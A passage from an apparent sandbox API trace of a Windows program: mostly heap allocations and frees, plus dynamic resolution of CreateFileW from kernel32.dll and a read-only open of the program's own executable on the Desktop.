Size=0x20) returned 0x43cfc70 [0118.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0118.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0118.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0118.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0118.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0118.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0118.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0118.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0118.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0118.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0118.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0118.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0118.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0118.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0118.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0118.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0118.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0118.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0118.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0118.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0118.587] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0118.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0118.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0118.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0118.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0118.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0118.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0118.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0118.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0118.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0118.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0118.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0118.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0118.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0118.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0118.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0118.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0118.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0118.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0118.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0118.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0118.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0118.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0118.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0118.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0118.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0118.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0118.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0118.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0118.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0118.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0118.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0118.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0118.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0118.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0118.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0118.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0118.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0118.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0118.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0118.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0118.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0118.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0118.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0118.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0118.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0118.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0118.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0118.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0118.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0118.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0118.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0118.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0118.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0118.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0118.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0118.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0118.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0118.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0118.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0118.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0118.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0118.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0118.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0118.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0118.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0118.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0118.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0118.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0118.590] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0118.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0118.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0118.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0118.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0118.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0118.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0118.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0118.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0118.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0118.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0118.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0118.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0118.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0118.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0118.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0118.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0118.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0118.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0118.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0118.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0118.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0118.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0118.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0118.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0118.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0118.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0118.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0118.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0118.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0118.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0118.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0118.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0118.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0118.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0118.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0118.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0118.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0118.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0118.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0118.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0118.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0118.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0118.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0118.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0118.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0118.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0118.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0118.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0118.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0118.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0118.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0118.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0118.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0118.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0118.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0118.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0118.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0118.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0118.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0118.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0118.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.592] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0118.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0118.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0118.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8e0 [0118.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca8e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0118.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0118.593] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0118.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0118.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0118.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0118.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0118.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0118.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0118.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0118.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0118.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0118.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0118.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0118.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0118.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0118.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0118.593] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\42f0.tmp.exe.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0118.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0118.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea6b8 [0118.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0118.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0118.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0118.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0118.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0118.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0118.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0118.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0118.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0118.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0118.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0118.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359cd8 [0118.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0118.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0118.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0118.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0118.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0118.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0118.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0118.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0118.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0118.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0118.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0118.595] FreeLibrary (hLibModule=0x772d0000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: 